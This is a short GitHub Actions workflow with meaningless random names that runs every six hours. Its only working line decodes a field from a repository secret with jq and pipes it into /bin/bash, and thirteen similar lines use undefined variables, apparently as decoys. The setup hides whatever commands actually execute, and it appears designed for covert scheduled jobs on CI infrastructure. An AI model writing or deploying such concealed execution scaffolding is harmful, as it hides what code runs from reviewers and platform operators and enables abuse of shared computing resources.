name: xishanyanhoukl

on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xishanyanhoukl
        env:
          ipgj357: ${{ secrets.ipgj357 }}
        run: |
          echo $ipgj357 | jq -r .a7 | /bin/bash
          echo $j635 | jq -r .ihhg776 | /bin/bash
          echo $u9 | jq -r .eeg934 | /bin/bash
          echo $ac8743 | jq -r .cb41 | /bin/bash
          echo $sfa212 | jq -r .th82391 | /bin/bash
          echo $pz82265 | jq -r .jvk14 | /bin/bash
          echo $ccm148 | jq -r .w3938 | /bin/bash
          echo $hwj8 | jq -r .qf43816 | /bin/bash
          echo $pbo470 | jq -r .szzb4416 | /bin/bash
          echo $m174 | jq -r .f5794 | /bin/bash
          echo $cp46 | jq -r .hmsbv05037 | /bin/bash
          echo $bwyk1 | jq -r .ydz4 | /bin/bash
          echo $ewn1 | jq -r .k192 | /bin/bash
          echo $pv5541 | jq -r .ar01 | /bin/bash

